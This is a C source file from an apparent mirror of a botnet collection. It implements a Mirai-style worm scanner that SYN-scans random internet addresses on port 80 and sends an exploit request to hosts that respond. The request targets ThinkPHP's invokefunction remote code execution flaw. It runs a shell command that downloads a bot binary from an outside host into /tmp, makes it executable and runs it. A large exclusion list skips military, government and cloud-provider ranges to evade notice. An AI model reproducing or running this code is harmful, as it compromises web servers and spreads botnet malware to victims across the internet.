Mirrors
/
TL-BOTS
mirror of https://github.com/threatland/TL-BOTS
6
0
Fork 0
Code Issues Projects Releases Wiki Activity
TL-BOTS/TL.EXPLOIT_SCAN/SCANNER.ThinkPHP/Thinkphp_scanner.c

653 lines
30 KiB
C
Raw Permalink Blame History

#ifdef SELFREP
#define _GNU_SOURCE
#ifdef DEBUG
#include <stdio.h>
#endif
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <sys/select.h>
#include <sys/types.h>
#include <time.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <string.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include "includes.h"
#include "Thinkphp_scanner.h"
#include "table.h"
#include "rand.h"
#include "util.h"
#include "checksum.h"
int Thinkphp_scanner_pid = 0, Thinkphp_rsck = 0, Thinkphp_rsck_out = 0;
char Thinkphp_scanner_rawpkt[sizeof(struct iphdr) + sizeof(struct tcphdr)] = {0};
struct Thinkphp_scanner_connection *conn_table;
uint32_t Thinkphp_fake_time = 0;
int Thinkranges[] = {95,112,151,212,88,104};
int Thinkphp_recv_strip_null(int sock, void *buf, int len, int flags)
{
int ret = recv(sock, buf, len, flags);
if (ret > 0)
{
int i = 0;
for (i = 0; i < ret; i++)
{
if (((char *)buf)[i] == 0x00)
{
((char *)buf)[i] = 'A';
}
}
}
return ret;
}
void Thinkphp_scanner(void)
{
int i = 0;
uint16_t source_port;
struct iphdr *iph;
struct tcphdr *tcph;
// Let parent continue on main thread
Thinkphp_scanner_pid = fork();
if (Thinkphp_scanner_pid > 0 || Thinkphp_scanner_pid == -1)
return;
LOCAL_ADDR = util_local_addr();
rand_init();
Thinkphp_fake_time = time(NULL);
conn_table = calloc(Thinkphp_SCANNER_MAX_CONNS, sizeof(struct Thinkphp_scanner_connection));
for (i = 0; i < Thinkphp_SCANNER_MAX_CONNS; i++)
{
conn_table[i].state = Thinkphp_SC_CLOSED;
conn_table[i].fd = -1;
}
// Set up raw socket scanning and payload
if ((Thinkphp_rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
{
#ifdef DEBUG
printf("[scanner] failed to initialize raw socket, cannot scan\n");
#endif
exit(0);
}
fcntl(Thinkphp_rsck, F_SETFL, O_NONBLOCK | fcntl(Thinkphp_rsck, F_GETFL, 0));
i = 1;
if (setsockopt(Thinkphp_rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) != 0)
{
#ifdef DEBUG
printf("[scanner] failed to set IP_HDRINCL, cannot scan\n");
#endif
close(Thinkphp_rsck);
exit(0);
}
do
{
source_port = rand_next() & 0xffff;
} while (ntohs(source_port) < 1024);
iph = (struct iphdr *)Thinkphp_scanner_rawpkt;
tcph = (struct tcphdr *)(iph + 1);
// Set up IPv4 header
iph->ihl = 5;
iph->version = 4;
iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr));
iph->id = rand_next();
iph->ttl = 64;
iph->protocol = IPPROTO_TCP;
// Set up TCP header
tcph->dest = htons(80);
tcph->source = source_port;
tcph->doff = 5;
tcph->window = rand_next() & 0xffff;
tcph->syn = TRUE;
#ifdef DEBUG
printf("[scanner] scanner process initialized. scanning started.\n");
#endif
// Main logic loop
while (TRUE)
{
fd_set fdset_rd, fdset_wr;
struct Thinkphp_scanner_connection *conn;
struct timeval tim;
int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;
// Spew out SYN to try and get a response
if (Thinkphp_fake_time != last_spew)
{
last_spew = Thinkphp_fake_time;
for (i = 0; i < Thinkphp_SCANNER_RAW_PPS; i++)
{
struct sockaddr_in paddr = {0};
struct iphdr *iph = (struct iphdr *)Thinkphp_scanner_rawpkt;
struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
iph->id = rand_next();
iph->saddr = LOCAL_ADDR;
iph->daddr = Thinkphp_get_random_ip();
iph->check = 0;
iph->check = checksum_generic((uint16_t *)iph, sizeof(struct iphdr));
tcph->dest = htons(80);
tcph->seq = iph->daddr;
tcph->check = 0;
tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof(struct tcphdr)), sizeof(struct tcphdr));
paddr.sin_family = AF_INET;
paddr.sin_addr.s_addr = iph->daddr;
paddr.sin_port = tcph->dest;
sendto(Thinkphp_rsck, Thinkphp_scanner_rawpkt, sizeof(Thinkphp_scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof(paddr));
}
}
// Read packets from raw socket to get SYN+ACKs
last_avail_conn = 0;
while (TRUE)
{
int n = 0;
char dgram[1514];
struct iphdr *iph = (struct iphdr *)dgram;
struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
struct Thinkphp_scanner_connection *conn;
errno = 0;
n = recvfrom(Thinkphp_rsck, dgram, sizeof(dgram), MSG_NOSIGNAL, NULL, NULL);
if (n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)
break;
if (n < sizeof(struct iphdr) + sizeof(struct tcphdr))
continue;
if (iph->daddr != LOCAL_ADDR)
continue;
if (iph->protocol != IPPROTO_TCP)
continue;
if (tcph->source != htons(80))
continue;
if (tcph->dest != source_port)
continue;
if (!tcph->syn)
continue;
if (!tcph->ack)
continue;
if (tcph->rst)
continue;
if (tcph->fin)
continue;
if (htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)
continue;
conn = NULL;
for (n = last_avail_conn; n < Thinkphp_SCANNER_MAX_CONNS; n++)
{
if (conn_table[n].state == Thinkphp_SC_CLOSED)
{
conn = &conn_table[n];
last_avail_conn = n;
break;
}
}
// If there were no slots, then no point reading any more
if (conn == NULL)
break;
conn->dst_addr = iph->saddr;
conn->dst_port = tcph->source;
Thinkphp_setup_connection(conn);
}
FD_ZERO(&fdset_rd);
FD_ZERO(&fdset_wr);
for (i = 0; i < Thinkphp_SCANNER_MAX_CONNS; i++)
{
int timeout = 5;
conn = &conn_table[i];
//timeout = (conn->state > Thinkphp_SC_CONNECTING ? 30 : 5);
if (conn->state != Thinkphp_SC_CLOSED && (Thinkphp_fake_time - conn->last_recv) > timeout)
{
close(conn->fd);
conn->fd = -1;
conn->state = Thinkphp_SC_CLOSED;
util_zero(conn->rdbuf, sizeof(conn->rdbuf));
continue;
}
if (conn->state == Thinkphp_SC_CONNECTING || conn->state == Thinkphp_SC_EXPLOIT_STAGE2 || conn->state == Thinkphp_SC_EXPLOIT_STAGE3)
{
FD_SET(conn->fd, &fdset_wr);
if (conn->fd > mfd_wr)
mfd_wr = conn->fd;
}
else if (conn->state != Thinkphp_SC_CLOSED)
{
FD_SET(conn->fd, &fdset_rd);
if (conn->fd > mfd_rd)
mfd_rd = conn->fd;
}
}
tim.tv_usec = 0;
tim.tv_sec = 1;
nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);
Thinkphp_fake_time = time(NULL);
for (i = 0; i < Thinkphp_SCANNER_MAX_CONNS; i++)
{
conn = &conn_table[i];
if (conn->fd == -1)
continue;
if (FD_ISSET(conn->fd, &fdset_wr))
{
int err = 0, ret = 0;
socklen_t err_len = sizeof(err);
ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);
if (err == 0 && ret == 0)
{
if (conn->state == Thinkphp_SC_EXPLOIT_STAGE2)
{
#ifdef DEBUG
printf("[scanner] FD%d sending payload\n", conn->fd);
#endif
util_strcpy(conn->payload_buf, "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://1.1.1.1/bins/Karu.x86 -O /tmp/.hacks; chmod 777 /tmp/.hacks; /tmp/.hacks Karu.x86' HTTP/1.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: /\r\nUser-Agent: Karu/2.0\r\n\r\n")");
send(conn->fd, conn->payload_buf, util_strlen(conn->payload_buf), MSG_NOSIGNAL);
util_zero(conn->payload_buf, sizeof(conn->payload_buf));
util_zero(conn->rdbuf, sizeof(conn->rdbuf));
close(conn->fd);
Thinkphp_setup_connection(conn);
conn->state = Thinkphp_SC_EXPLOIT_STAGE3;
continue;
}
else if (conn->state == Thinkphp_SC_EXPLOIT_STAGE3)
{
#ifdef DEBUG
printf("[scanner] FD%d finnished\n", conn->fd);
#endif
close(conn->fd);
conn->fd = -1;
conn->state = Thinkphp_SC_CLOSED;
continue;
}
else
{
#ifdef DEBUG
printf("[scanner] FD%d connected to %d.%d.%d.%d\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff);
#endif
conn->state = Thinkphp_SC_EXPLOIT_STAGE2;
}
}
else
{
close(conn->fd);
conn->fd = -1;
conn->state = Thinkphp_SC_CLOSED;
continue;
}
}
if (FD_ISSET(conn->fd, &fdset_rd))
{
while (TRUE)
{
int ret = 0;
if (conn->state == Thinkphp_SC_CLOSED)
break;
if (conn->rdbuf_pos == Thinkphp_SCANNER_RDBUF_SIZE)
{
memmove(conn->rdbuf, conn->rdbuf + Thinkphp_SCANNER_HACK_DRAIN, Thinkphp_SCANNER_RDBUF_SIZE - Thinkphp_SCANNER_HACK_DRAIN);
conn->rdbuf_pos -= Thinkphp_SCANNER_HACK_DRAIN;
}
errno = 0;
ret = Thinkphp_recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, Thinkphp_SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);
if (ret == 0)
{
errno = ECONNRESET;
ret = -1;
}
if (ret == -1)
{
if (errno != EAGAIN && errno != EWOULDBLOCK)
{
if (conn->state == Thinkphp_SC_EXPLOIT_STAGE2)
{
close(conn->fd);
Thinkphp_setup_connection(conn);
continue;
}
close(conn->fd);
conn->fd = -1;
conn->state = Thinkphp_SC_CLOSED;
util_zero(conn->rdbuf, sizeof(conn->rdbuf));
}
break;
}
conn->rdbuf_pos += ret;
conn->last_recv = Thinkphp_fake_time;
int len = util_strlen(conn->rdbuf);
conn->rdbuf[len] = 0;
}
}
}
}
}
void Thinkphp_kill(void)
{
kill(Thinkphp_scanner_pid, 9);
}
static void Thinkphp_setup_connection(struct Thinkphp_scanner_connection *conn)
{
struct sockaddr_in addr = {0};
if (conn->fd != -1)
close(conn->fd);
if ((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
return;
}
conn->rdbuf_pos = 0;
util_zero(conn->rdbuf, sizeof(conn->rdbuf));
fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = conn->dst_addr;
addr.sin_port = conn->dst_port;
conn->last_recv = Thinkphp_fake_time;
if (conn->state == Thinkphp_SC_EXPLOIT_STAGE2 || conn->state == Thinkphp_SC_EXPLOIT_STAGE3)
{
}
else
{
conn->state = Thinkphp_SC_CONNECTING;
}
connect(conn->fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));
}
static ipv4_t Thinkphp_get_random_ip(void)
{
uint32_t tmp;
uint8_t o1 = 0, o2 = 0, o3 = 0, o4 = 0;
do
{
int range = rand() % (sizeof(dranges)/sizeof(char *));
tmp = rand_next();
o1 = Thinkranges[range];
o2 = (tmp >> 8) & 0xff;
o3 = (tmp >> 16) & 0xff;
o4 = (tmp >> 24) & 0xff;
} while (o1 == 127 || //Loopback
(o1 == 0) || //Invalid address space
(o1 == 3) || //General Electric Company
(o1 == 15 || o1 == 16) || //Hewlett-Packard Company
(o1 == 56) || //US Postal Service
(o1 == 10) || //Internal network
(o1 == 25) || //Some more
(o1 == 49) || //Some more
(o1 == 50) || //Some more
(o1 == 137) || //Some more
(o1 == 6) || //Department of Defense
(o1 == 7) || //Department of Defense
(o1 == 11) || //Department of Defense
(o1 == 21) || //Department of Defense
(o1 == 22) || //Department of Defense
(o1 == 26) || //Department of Defense
(o1 == 28) || //Department of Defense
(o1 == 29) || //Department of Defense
(o1 == 30) || //Department of Defense
(o1 == 33) || //Department of Defense
(o1 == 55) || //Department of Defense
(o1 == 214) || //Department of Defense
(o1 == 215) || //Department of Defense
(o1 == 192 && o2 == 168) || //Internal network
(o1 == 172 && o2 >= 16 && o2 < 32) || //Internal network
(o1 == 100 && o2 >= 64 && o2 < 127) || //IANA NAT reserved
(o1 == 169 && o2 > 254) || //IANA NAT reserved
(o1 == 198 && o2 >= 18 && o2 < 20) || //IANA Special use
(o1 == 146 && o2 == 17) || //Some more
(o1 == 146 && o2 == 80) || //Some more
(o1 == 146 && o2 == 98) || //Some more
(o1 == 146 && o2 == 154) || //Some more
(o1 == 147 && o2 == 159) || //Some more
(o1 == 148 && o2 == 114) || //Some more
(o1 == 150 && o2 == 125) || //Some more
(o1 == 150 && o2 == 133) || //Some more
(o1 == 150 && o2 == 144) || //Some more
(o1 == 150 && o2 == 149) || //Some more
(o1 == 150 && o2 == 157) || //Some more
(o1 == 150 && o2 == 184) || //Some more
(o1 == 150 && o2 == 190) || //Some more
(o1 == 150 && o2 == 196) || //Some more
(o1 == 152 && o2 == 82) || //Some more
(o1 == 152 && o2 == 229) || //Some more
(o1 == 157 && o2 == 202) || //Some more
(o1 == 157 && o2 == 217) || //Some more
(o1 == 161 && o2 == 124) || //Some more
(o1 == 162 && o2 == 32) || //Some more
(o1 == 155 && o2 == 96) || //Some more
(o1 == 155 && o2 == 149) || //Some more
(o1 == 155 && o2 == 155) || //Some more
(o1 == 155 && o2 == 178) || //Some more
(o1 == 164 && o2 == 158) || //Some more
(o1 == 156 && o2 == 9) || //Some more
(o1 == 167 && o2 == 44) || //Some more
(o1 == 168 && o2 == 68) || //Some more
(o1 == 168 && o2 == 85) || //Some more
(o1 == 168 && o2 == 102) || //Some more
(o1 == 203 && o2 == 59) || //Some more
(o1 == 204 && o2 == 34) || //Some more
(o1 == 207 && o2 == 30) || //Some more
(o1 == 117 && o2 == 55) || //Some more
(o1 == 117 && o2 == 56) || //Some more
(o1 == 80 && o2 == 235) || //Some more
(o1 == 207 && o2 == 120) || //Some more
(o1 == 209 && o2 == 35) || //Some more
(o1 == 64 && o2 == 70) || //Some more
(o1 == 64 && o2 >= 69 && o2 < 227) || //Some more
(o1 == 128 && o2 >= 35 && o2 < 237) || //Some more
(o1 == 129 && o2 >= 22 && o2 < 255) || //Some more
(o1 == 130 && o2 >= 40 && o2 < 168) || //Some more
(o1 == 131 && o2 >= 3 && o2 < 251) || //Some more
(o1 == 132 && o2 >= 3 && o2 < 251) || //Some more
(o1 == 134 && o2 >= 5 && o2 < 235) || //Some more
(o1 == 136 && o2 >= 177 && o2 < 223) || //Some more
(o1 == 138 && o2 >= 13 && o2 < 194) || //Some more
(o1 == 139 && o2 >= 31 && o2 < 143) || //Some more
(o1 == 140 && o2 >= 1 && o2 < 203) || //Some more
(o1 == 143 && o2 >= 45 && o2 < 233) || //Some more
(o1 == 144 && o2 >= 99 && o2 < 253) || //Some more
(o1 == 146 && o2 >= 165 && o2 < 166) || //Some more
(o1 == 147 && o2 >= 35 && o2 < 43) || //Some more
(o1 == 147 && o2 >= 103 && o2 < 105) || //Some more
(o1 == 147 && o2 >= 168 && o2 < 170) || //Some more
(o1 == 147 && o2 >= 198 && o2 < 200) || //Some more
(o1 == 147 && o2 >= 238 && o2 < 255) || //Some more
(o1 == 150 && o2 >= 113 && o2 < 115) || //Some more
(o1 == 152 && o2 >= 151 && o2 < 155) || //Some more
(o1 == 153 && o2 >= 21 && o2 < 32) || //Some more
(o1 == 155 && o2 >= 5 && o2 < 10) || //Some more
(o1 == 155 && o2 >= 74 && o2 < 89) || //Some more
(o1 == 155 && o2 >= 213 && o2 < 222) || //Some more
(o1 == 157 && o2 >= 150 && o2 < 154) || //Some more
(o1 == 158 && o2 >= 1 && o2 < 21) || //Some more
(o1 == 158 && o2 >= 235 && o2 < 247) || //Some more
(o1 == 159 && o2 >= 120 && o2 < 121) || //Some more
(o1 == 160 && o2 >= 132 && o2 < 151) || //Some more
(o1 == 64 && o2 >= 224 && o2 < 227) || //Some more
(o1 == 162 && o2 >= 45 && o2 < 47) || //CIA
(o1 == 163 && o2 >= 205 && o2 < 207) || //NASA Kennedy Space Center
(o1 == 164 && o2 >= 45 && o2 < 50) || //NASA Kennedy Space Center
(o1 == 164 && o2 >= 217 && o2 < 233) || //NASA Kennedy Space Center
(o1 == 169 && o2 >= 252 && o2 < 254) || //U.S. Department of State
(o1 == 199 && o2 >= 121 && o2 < 254) || //Naval Air Systems Command, VA
(o1 == 205 && o2 >= 1 && o2 < 118) || //Department of the Navy, Space and Naval Warfare System Command, Washington DC - SPAWAR
(o1 == 207 && o2 >= 60 && o2 < 62) || //FBI controlled Linux servers & IPs/IP-Ranges
(o1 == 104 && o2 >= 16 && o2 < 31) || //Cloudflare
(o1 == 188 && o2 == 166) || //Digital Ocean
(o1 == 188 && o2 == 226) || //Digital Ocean
(o1 == 159 && o2 == 203) || //Digital Ocean
(o1 == 162 && o2 == 243) || //Digital Ocean
(o1 == 45 && o2 == 55) || //Digital Ocean
(o1 == 178 && o2 == 62) || //Digital Ocean
(o1 == 104 && o2 == 131) || //Digital Ocean
(o1 == 104 && o2 == 236) || //Digital Ocean
(o1 == 107 && o2 == 170) || //Digital Ocean
(o1 == 138 && o2 == 197) || //Digital Ocean
(o1 == 138 && o2 == 68) || //Digital Ocean
(o1 == 139 && o2 == 59) || //Digital Ocean
(o1 == 146 && o2 == 185 && o3 >= 128 && o3 < 191) || //Digital Ocean
(o1 == 163 && o2 == 47 && o3 >= 10 && o3 < 11) || //Digital Ocean
(o1 == 174 && o2 == 138 && o3 >= 1 && o3 < 127) || //Digital Ocean
(o1 == 192 && o2 == 241 && o3 >= 128 && o3 < 255) || //Digital Ocean
(o1 == 198 && o2 == 199 && o3 >= 64 && o3 < 127) || //Digital Ocean
(o1 == 198 && o2 == 211 && o3 >= 96 && o3 < 127) || //Digital Ocean
(o1 == 207 && o2 == 154 && o3 >= 192 && o3 < 255) || //Digital Ocean
(o1 == 37 && o2 == 139 && o3 >= 1 && o3 < 31) || //Digital Ocean
(o1 == 67 && o2 == 207 && o3 >= 64 && o3 < 95) || //Digital Ocean
(o1 == 67 && o2 == 205 && o3 >= 128 && o3 < 191) || //Digital Ocean
(o1 == 80 && o2 == 240 && o3 >= 128 && o3 < 143) || //Digital Ocean
(o1 == 82 && o2 == 196 && o3 >= 1 && o3 < 15) || //Digital Ocean
(o1 == 95 && o2 == 85 && o3 >= 8 && o3 < 63) || //Digital Ocean
(o1 == 64 && o2 == 237 && o3 >= 32 && o3 < 43) || //Choopa & Vultr
(o1 == 185 && o2 == 92 && o3 >= 220 && o3 < 223) || //Choopa & Vultr
(o1 == 104 && o2 == 238 && o3 >= 128 && o3 < 191) || //Choopa & Vultr
(o1 == 209 && o2 == 222 && o3 >= 1 && o3 < 31) || //Choopa & Vultr
(o1 == 208 && o2 == 167 && o3 >= 232 && o3 < 252) || //Choopa & Vultr
(o1 == 66 && o2 == 55 && o3 >= 128 && o3 < 159) || //Choopa & Vultr
(o1 == 45 && o2 == 63 && o3 >= 1 && o3 < 127) || //Choopa & Vultr
(o1 == 216 && o2 == 237 && o3 >= 128 && o3 < 159) || //Choopa & Vultr
(o1 == 108 && o2 == 61) || //Choopa & Vultr
(o1 == 45 && o2 == 76) || //Choopa & Vultr
(o1 == 185 && o2 == 11 && o3 >= 144 && o3 < 148) || //Blazingfast & Nforce
(o1 == 185 && o2 == 56 && o3 >= 21 && o3 < 23) || //Blazingfast & Nforce
(o1 == 185 && o2 == 61 && o3 >= 136 && o3 < 139) || //Blazingfast & Nforce
(o1 == 185 && o2 == 62 && o3 >= 187 && o3 < 191) || //Blazingfast & Nforce
(o1 == 66 && o2 == 150 && o3 >= 120 && o3 < 215) || //Blazingfast & Nforce
(o1 == 66 && o2 == 151 && o3 >= 137 && o3 < 139) || //Blazingfast & Nforce
(o1 == 64 && o2 == 94 && o3 >= 237 && o3 < 255) || //Blazingfast & Nforce
(o1 == 63 && o2 == 251 && o3 >= 19 && o3 < 21) || //Blazingfast & Nforce
(o1 == 70 && o2 == 42 && o3 >= 73 && o3 < 75) || //Blazingfast & Nforce
(o1 == 74 && o2 == 91 && o3 >= 113 && o3 < 115) || //Blazingfast & Nforce
(o1 == 74 && o2 == 201 && o3 >= 56 && o3 < 58) || //Blazingfast & Nforce
(o1 == 188 && o2 == 209 && o3 >= 48 && o3 < 53) || //Blazingfast & Nforce
(o1 == 188 && o2 == 165) || //OVH
(o1 == 149 && o2 == 202) || //OVH
(o1 == 151 && o2 == 80) || //OVH
(o1 == 164 && o2 == 132) || //OVH
(o1 == 176 && o2 == 31) || //OVH
(o1 == 167 && o2 == 114) || //OVH
(o1 == 178 && o2 == 32) || //OVH
(o1 == 178 && o2 == 33) || //OVH
(o1 == 37 && o2 == 59) || //OVH
(o1 == 37 && o2 == 187) || //OVH
(o1 == 46 && o2 == 105) || //OVH
(o1 == 51 && o2 == 254) || //OVH
(o1 == 51 && o2 == 255) || //OVH
(o1 == 5 && o2 == 135) || //OVH
(o1 == 5 && o2 == 196) || //OVH
(o1 == 5 && o2 == 39) || //OVH
(o1 == 91 && o2 == 134) || //OVH
(o1 == 104 && o2 == 200 && o3 >= 128 && o3 < 159) || //Total Server Solutions
(o1 == 107 && o2 == 152 && o3 >= 96 && o3 < 111) || //Total Server Solutions
(o1 == 107 && o2 == 181 && o3 >= 160 && o3 < 189) || //Total Server Solutions
(o1 == 172 && o2 == 98 && o3 >= 64 && o3 < 95) || //Total Server Solutions
(o1 == 184 && o2 == 170 && o3 >= 240 && o3 < 255) || //Total Server Solutions
(o1 == 192 && o2 == 111 && o3 >= 128 && o3 < 143) || //Total Server Solutions
(o1 == 192 && o2 == 252 && o3 >= 208 && o3 < 223) || //Total Server Solutions
(o1 == 192 && o2 == 40 && o3 >= 56 && o3 < 59) || //Total Server Solutions
(o1 == 198 && o2 == 8 && o3 >= 81 && o3 < 95) || //Total Server Solutions
(o1 == 199 && o2 == 116 && o3 >= 112 && o3 < 119) || //Total Server Solutions
(o1 == 199 && o2 == 229 && o3 >= 248 && o3 < 255) || //Total Server Solutions
(o1 == 199 && o2 == 36 && o3 >= 220 && o3 < 223) || //Total Server Solutions
(o1 == 199 && o2 == 58 && o3 >= 184 && o3 < 187) || //Total Server Solutions
(o1 == 206 && o2 == 220 && o3 >= 172 && o3 < 175) || //Total Server Solutions
(o1 == 208 && o2 == 78 && o3 >= 40 && o3 < 43) || //Total Server Solutions
(o1 == 208 && o2 == 93 && o3 >= 192 && o3 < 193) || //Total Server Solutions
(o1 == 66 && o2 == 71 && o3 >= 240 && o3 < 255) || //Total Server Solutions
(o1 == 98 && o2 == 142 && o3 >= 208 && o3 < 223) || //Total Server Solutions
(o1 == 107 && o2 >= 20 && o2 < 24) || //Amazon
(o1 == 35 && o2 >= 159 && o2 < 183) || //Amazon
(o1 == 52 && o2 >= 1 && o2 < 95) || //Amazon
(o1 == 52 && o2 >= 95 && o2 < 255) || //Amazon + Microsoft
(o1 == 54 && o2 >= 64 && o2 < 95) || //Amazon + Microsoft
(o1 == 54 && o2 >= 144 && o2 < 255) || //Amazon + Microsoft
(o1 == 13 && o2 >= 52 && o2 < 60) || //Amazon + Microsoft
(o1 == 13 && o2 >= 112 && o2 < 115) || //Amazon + Microsoft
(o1 == 163 && o2 == 172) || //ONLINE SAS
(o1 == 51 && o2 >= 15 && o2 < 255) || //ONLINE SAS
(o1 == 79 && o2 == 121 && o3 >= 128 && o3 < 255) || //Some more
(o1 == 212 && o2 == 47 && o3 >= 224 && o3 < 255) || //Some more
(o1 == 89 && o2 == 34 && o3 >= 96 && o3 < 97) || //Some more
(o1 == 219 && o2 >= 216 && o2 < 231) || //Some more
(o1 == 23 && o2 >= 94 && o2 < 109) || //Some more
(o1 == 178 && o2 >= 62 && o2 < 63) || //Some more
(o1 == 106 && o2 >= 182 && o2 < 189) || //Some more
(o1 == 106 && o2 >= 184) || //Some more
(o1 == 34 && o2 >= 245 && o2 < 255) || //Some more
(o1 == 87 && o2 >= 97 && o2 < 99) || //Some more
(o1 == 86 && o2 == 208) || //Some more
(o1 == 86 && o2 == 209) || //Some more
(o1 == 193 && o2 == 164) || //Some more
(o1 == 120 && o2 >= 103 && o2 < 108) || //Ministry of Education Computer Science
(o1 == 188 && o2 == 68) || //Ministry of Education Computer Science
(o1 == 78 && o2 == 46) || //Ministry of Education Computer Science
(o1 >= 224) || //Multicast
(o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
);
return INET_ADDR(o1, o2, o3, o4);
}
#endif
Reference in New Issue View Git Blame Copy Permalink